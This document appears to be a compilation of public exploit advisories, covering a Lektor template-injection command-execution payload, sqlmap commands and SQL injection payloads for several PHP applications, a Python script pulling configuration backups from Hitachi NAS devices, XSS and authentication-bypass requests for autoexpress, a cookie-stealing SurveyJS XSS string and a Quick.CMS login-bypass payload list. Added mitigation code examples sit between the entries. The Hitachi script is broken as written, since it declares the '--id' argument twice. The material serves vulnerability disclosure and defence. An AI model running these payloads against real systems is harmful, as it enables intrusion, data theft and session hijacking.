<pre><code># Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload<br /># Date: 20/03/2024<br /># Exploit Author: kai6u<br /># Vendor Homepage: https://www.getlektor.com/<br /># Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10<br /># Version: 3.3.10<br /># Tested on: Ubuntu 22.04<br /># Summary:<br />An arbitrary file upload vulnerability exists in Lektor. It is possible to upload a file to any directory on the server.<br /> Affected Version:<br /> < Version Release v3.3.10 (https://github.com/lektor/lektor/releases/tag/v3.3.10)<br /> Fixed Version:<br /> Latest Version Release v3.3.11 (https://github.com/lektor/lektor/releases/tag/v3.3.11)<br /># Steps:<br />The following are the steps of an attack that an attacker might perform.<br /> 1. Arbitrary File Upload and Store the payload<br /> Access the administrator console and use the Add Page function to create a file<br />containing the payload in the templates directory and prepare to execute the<br />command.<br /> 2. Execute Command<br /> Next, execute arbitrary commands on the administrator console by referencing the<br />file containing the malicious payload as a template.<br /><br /># Description:<br />1 ) With access to the administrator console via the network, first create a contents.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory. (An attacker can also upload to any directory.)<br /><br />Payload:<br /><br />{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}<br /><br />2 ) Create a new page by specifying the created contents.lr as template.<br /><br />3 ) Use the preview function to check the sample page with the specified templates.<br /><br /># Impact<br />Since attackers can execute arbitrary commands on the target environment, they can:<br /> 1. Steal sensitive files on the server.<br /> 2. Browse files such as /etc/passwd and configure the server to allow SSH connections as an OS user.<br /> 3. Use the server as a stepping stone for another attack and perform malicious actions.<br /> 4. Encrypt all content in the server and demand money.<br /> 5. Shut down the server and disrupt the target.<br />This is very dangerous because commands can be executed if the administrator's console can be accessed via the network.<br /><br /># References<br />https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti<br />https://github.com/lektor/lektor/releases/tag/v3.3.11<br /><br /></code></pre>
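<p>A containment check for the Add Page write described above, as an added example: it is a general mitigation sketch, not Lektor's code and not the change shipped in v3.3.11. The function names <code>resolve_page_dir</code> and <code>add_page</code>, the slash-separated page path and the project layout are assumptions made for the illustration.</p>

```python
import tempfile
from pathlib import Path


def resolve_page_dir(content_root, page_path):
    """Map a slash-separated page path to a directory under content_root.

    Raises ValueError when the path would leave content_root, for example to
    reach a sibling templates/ directory. (Hypothetical helper.)
    """
    root = Path(content_root).resolve()
    segments = [s for s in page_path.replace("\\", "/").split("/") if s]
    for seg in segments:
        # Reject traversal, NUL and drive-letter segments before touching disk.
        if seg in (".", "..") or "\x00" in seg or ":" in seg:
            raise ValueError(f"illegal path segment: {seg!r}")
    # resolve() follows symlinks, so a link inside content/ that points at
    # templates/ is caught by the containment check below.
    target = root.joinpath(*segments).resolve()
    if target != root and root not in target.parents:
        raise ValueError("page path escapes the content directory")
    return target


def add_page(content_root, page_path, body):
    """Write contents.lr for a new page only after the path check passes."""
    page_dir = resolve_page_dir(content_root, page_path)
    page_dir.mkdir(parents=True, exist_ok=True)
    out = page_dir / "contents.lr"
    out.write_text(body, encoding="utf-8")
    return out


def demo():
    """Constructed project tree with content/ and templates/ side by side."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        project = Path(tmp)
        (project / "content").mkdir()
        (project / "templates").mkdir()
        # Constructed page paths: one legitimate, two that aim at templates/.
        for path in ("/blog/first-post", "/../templates", "/blog/../../templates"):
            try:
                add_page(project / "content", path, "title: demo\n")
                results[path] = "written"
            except ValueError as exc:
                results[path] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for path, outcome in demo().items():
        print(path, "->", outcome)
```

<p>The check only constrains where the file lands; templates should still never be loaded from a location that the page editor can write to.</p>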
<pre><code># Exploit Title: Simple Task List 1.0 - 'status' SQLi<br /># Date: 2023-11-15<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46023<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.<br /><br />Vulnerable File: /addTask.php<br /><br />Parameter Name: status<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Register and log in to the system<br />2. Add a project and a task<br />3. Then use sqlmap to exploit<br />4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=&lt;php-cookie-value&gt;" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br /># SQLMap Response:<br />----------------------<br />---<br />Parameter: status (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'<br />---<br /><br /></code></pre>
<pre><code># Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi<br /># Date: 2023-11-15<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46024<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.<br /><br />Vulnerable File: /index.php<br /><br />Parameter Name: searchdata<br /><br /># Proof of Concept:<br />----------------------<br /><br />Execute sqlmap using the 'searchdata' parameter to retrieve the current database:<br /><br />sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />---<br />Parameter: searchdata (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: searchdata=test%';SELECT SLEEP(5)#&search=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 15 columns<br /> Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=<br />---<br /><br /></code></pre>
<pre><code># Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure<br /># CVE: CVE-2023-6538<br /># Date: 2023-12-13<br /># Exploit Author: Arslan Masood (@arszilla)<br /># Vendor: https://www.hitachivantara.com/<br /># Version: < 14.8.7825.01<br /># Tested On: 13.9.7021.04 <br /><br />import argparse<br />from os import getcwd<br /><br />import requests<br /><br />parser = argparse.ArgumentParser(<br /> description="CVE-2023-6538 PoC",<br /> usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"<br /> )<br /><br /># Create --host argument:<br />parser.add_argument(<br /> "--host",<br /> required=True,<br /> type=str,<br /> help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="JSESSIONID cookie value"<br /> )<br /><br /># Create --sso argument:<br />parser.add_argument(<br /> "--sso",<br /> required=True,<br /> type=str,<br /> help="JSESSIONIDSSO cookie value"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="Server ID value"<br /> )<br /><br />args = parser.parse_args()<br /><br />def download_file(hostname, jsessionid, jsessionidsso, serverid):<br /> # Set the filename:<br /> filename = "registry_data.tgz"<br /><br /> # Vulnerable SMU URL:<br /> smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"<br /><br /> # GET request cookies<br /> smu_cookies = {<br /> "JSESSIONID": jsessionid,<br /> "JSESSIONIDSSO": jsessionidsso<br /> }<br /><br /> # GET request headers:<br /> smu_headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",<br /> "Accept": 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Dnt": "1",<br /> "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /><br /> # Send the request:<br /> with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:<br /> with open(filename, 'wb') as backup_archive:<br /> # Write the zip file to the CWD:<br /> backup_archive.write(file_download.content)<br /><br /> print(f"{filename} has been downloaded to {getcwd()}")<br /><br />if __name__ == "__main__":<br /> download_file(args.host, args.id, args.sso, args.id)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48903<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903<br />https://www.cve.org/CVERecord?id=CVE-2023-48903<br /><br /># Description:<br />Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows an unauthenticated attacker to execute JavaScript commands.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress"<br />+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)<br />+ The form-data name "imageType[]" is vulnerable<br /><br /># Sample Request<br />POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1<br />Host: localhost<br />Content-Length: 17016<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR<br />Origin: http://localhost<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="files[]"; filename="image.jpeg"<br />Content-Type: image/jpeg<br /><br />IMAGE_CONTENT<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="id"<br /><br />CAR_ID<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="fd[]"<br /><br />IMAGE_CONTENT_BASE64_ENCODED<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br /><br />Content-Disposition: form-data; name="imgType[]"<br /><br />data:image/jpeg;base64"onerror=alert(1002)&lt;!--------WebKitFormBoundary9juDWgTa5YsjE2YR--<br /></code></pre>
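<p>Server-side handling for the <code>imgType[]</code> field in the sample request above, shown as an added example rather than autoexpress code (the project itself is PHP). It assumes the stored value is later rendered into an <code>&lt;img src&gt;</code> attribute together with the <code>fd[]</code> data; the function names and the allowlist are hypothetical.</p>

```python
import base64
import binascii
import html
import re

# Assumed allowlist of data-URI prefixes the upload form legitimately sends.
ALLOWED_IMG_TYPE = re.compile(r"data:image/(?:jpeg|png|gif|webp);base64")

# The imgType[] value from the sample request, and a constructed benign pair.
PAGE_PAYLOAD = 'data:image/jpeg;base64"onerror=alert(1002)<!--'
BENIGN_TYPE = "data:image/jpeg;base64"
BENIGN_DATA = "/9j/"  # constructed: base64 of the three JPEG magic bytes


def img_tag_unsafe(img_type, b64_data):
    """Before: request fields are concatenated straight into the attribute."""
    return '<img src="' + img_type + "," + b64_data + '">'


def img_tag_encoded(img_type, b64_data):
    """Output encoding alone: quotes and angle brackets become entities."""
    return '<img src="' + html.escape(img_type + "," + b64_data, quote=True) + '">'


def img_tag_safe(img_type, b64_data):
    """After: validate both fields on input, then encode on output."""
    if not ALLOWED_IMG_TYPE.fullmatch(img_type):
        raise ValueError("imgType is not an allowed image data-URI prefix")
    try:
        base64.b64decode(b64_data, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("image data is not valid base64") from exc
    # Encoding is kept after validation so a later change to the allowlist
    # cannot reintroduce an attribute breakout.
    return img_tag_encoded(img_type, b64_data)


def demo():
    """Render the page's value through each path and report the outcome."""
    out = {
        "unsafe": img_tag_unsafe(PAGE_PAYLOAD, BENIGN_DATA),
        "encoded": img_tag_encoded(PAGE_PAYLOAD, BENIGN_DATA),
        "benign": img_tag_safe(BENIGN_TYPE, BENIGN_DATA),
    }
    try:
        out["safe"] = img_tag_safe(PAGE_PAYLOAD, BENIGN_DATA)
    except ValueError as exc:
        out["safe"] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:8} {value}")
```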
<pre><code># Exploit Title: tramyardg autoexpress - Authentication Bypass<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48902<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48902<br />https://www.cve.org/CVERecord?id=CVE-2023-48902<br /><br /># Description:<br />Autoexpress 1.3.0 allows for authentication bypass via unauthenticated API access to admin functionality. This could allow a remote anonymous attacker to delete or update vehicles as well as upload images for vehicles.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress"<br />+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)<br /><br /># Sample Request<br />POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1<br />Host: localhost<br />Content-Length: 17016<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR<br />Origin: http://localhost<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="files[]"; filename="image.jpeg"<br />Content-Type: image/jpeg<br /><br />IMAGE_CONTENT<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="id"<br /><br />CAR_ID<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="fd[]"<br /><br />IMAGE_CONTENT_BASE64_ENCODED<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br /><br />Content-Disposition: form-data; name="imgType[]"<br /><br />data:image/jpeg;base64------WebKitFormBoundary9juDWgTa5YsjE2YR--<br /></code></pre>
<pre><code># Exploit Title: tramyardg autoexpress - SQL Injection<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48901<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901<br />https://www.cve.org/CVERecord?id=CVE-2023-48901<br /><br /># Description:<br />Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress/admin/sign-in.php"<br />+ Sign in with Admin credentials<br />+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" with Burp Suite set to "Intercept On"<br />+ Burp should capture a POST request to /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]<br />+ Send it to Repeater<br />+ Captured Burp Request:<br /><br />POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1<br />Host: localhost<br />Content-Length: 0<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />X-Requested-With: XMLHttpRequest<br />Origin: http://localhost<br />Referer: http://localhost/autoexpress/admin/inventory.php?username=admin<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=PHPSESSIONID<br />Connection: close<br /><br /># Sample Request<br />POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1<br />Host: localhost<br />Content-Length: 0<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />X-Requested-With: XMLHttpRequest<br />Origin: http://localhost<br />Referer: http://localhost/autoexpress/admin/inventory.php?username=admin<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=PHPSESSIONID<br />Connection: close<br /></code></pre>
<pre><code>Details:<br /><br />Cross Site Scripting vulnerability in Survey JS Survey Creator v.1.9.132<br />and before allows an attacker to execute arbitrary code via the input field<br />parameters of the creator survey section.<br /><br /> ------------------------------------------<br /><br /> [Vulnerability Type]<br /> Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />SurveyJS<br /><br />------------------------------------------<br />[Affected Product Code Base]<br />Survey Creator - v1.9.132 and before<br /><br />------------------------------------------<br />[Affected Component]<br />Every input field of the creator survey section is vulnerable to reflected and<br />stored cross-site scripting.<br /><br />------------------------------------------<br />[Attack Type]<br />Context-dependent<br /><br />------------------------------------------<br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br />[Attack Vectors]<br />some XSS filter evasion<br /><br />------------------------------------------<br />[Reference]<br />https://github.com/surveyjs/survey-creator/issues/5285<br /><br />------------------------------------------<br />[Has vendor confirmed or acknowledged the vulnerability?]<br />true<br /><br />------------------------------------------<br />[Discoverer]<br />Jettapol Pumwattanakul<br /><br />Use CVE-2024-28635<br /><br />#Proof of concept<br />Insert<br />[&gt;"&gt;&lt;img src="x:x" onerror="alert(document.cookie)"&gt;]<br />into the application's input fields to trigger reflected cross-site scripting.<br /></code></pre>
<pre><code># Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass<br /># Google Dork: N/A<br /># Date: 02-03-2024<br /># Exploit Author: ./H4X.Forensics - Diyar<br /># Vendor Homepage: https://www.opensolution.org<br /># Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip<br /># Version: 6.7<br /># Tested on: Windows<br /># CVE : N/A<br /><br />How to exploit :<br /><br />*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php<br />*--> Enter any Email like : root@root.com<br />*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1<br />*--> Tick the Checkbox<br />*--> Press Login<br />*--> Congratz!<br /><br /> *--> SQL Injection Authentication Bypass Payload : ' or '1'='1<br /><br />*--> Payloads that can be used :<br /><br />' or '1'='1<br />' or ''='<br />' or 1]%00<br />' or /* or '<br />' or "a" or '<br />' or 1 or '<br />' or true() or '<br /><br /></code></pre>
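<p>The Quick.CMS login bypass, the 'searchdata' search and the autoexpress 'id' parameter above break three different SQL contexts: a quoted string, a LIKE pattern and a bare number. The added example below shows the concatenated query beside its bound form for each, using inputs quoted from the advisories. It is not code from any of these PHP projects; Python's <code>sqlite3</code> stands in for their databases, and the tables, rows and function names are constructed for the illustration.</p>

```python
import sqlite3

# Inputs quoted from the advisories above (URL-decoded where needed).
LOGIN_PAYLOAD = "' or '1'='1"
SEARCH_PAYLOAD = "test%' AND 3912=3912 AND 'qxHV%'='qxHV"
ID_PAYLOAD = "3 and (ascii(substring((select version()),1,1))) = 56"


def make_db():
    """Constructed sample data; passwords are plaintext only for brevity."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admins (email TEXT, password TEXT);
        INSERT INTO admins VALUES ('admin@example.test', 'S3cret-pass');
        CREATE TABLE teachers (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO teachers (name) VALUES ('test teacher'), ('A. Other');
    """)
    return db


def login_concatenated(db, email, password):
    """Before: input becomes part of the SQL text."""
    sql = ("SELECT COUNT(*) FROM admins WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0


def login_bound(db, email, password):
    """After: placeholders keep input as data, whatever quotes it contains."""
    sql = "SELECT COUNT(*) FROM admins WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password)).fetchone()[0] > 0


def search_concatenated(db, term):
    """Before: the search term is spliced into the LIKE pattern."""
    sql = "SELECT name FROM teachers WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in db.execute(sql)]


def search_bound(db, term):
    """After: bind the term and escape LIKE wildcards so % and _ are literal."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM teachers WHERE name LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escaped + "%",))]


def parse_car_id(raw):
    """Numeric context: there are no quotes to escape, so accept digits only."""
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("id must be a decimal integer")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    print("login, concatenated:", login_concatenated(db, "root@root.com", LOGIN_PAYLOAD))
    print("login, bound:       ", login_bound(db, "root@root.com", LOGIN_PAYLOAD))
    print("search, concatenated:", search_concatenated(db, SEARCH_PAYLOAD))
    print("search, bound:       ", search_bound(db, SEARCH_PAYLOAD))
    try:
        parse_car_id(ID_PAYLOAD)
    except ValueError as exc:
        print("id rejected:", exc)
```

<p>In the concatenated search the row comes back although no stored name contains the submitted text, which shows the input was parsed as SQL instead of being matched as data.</p>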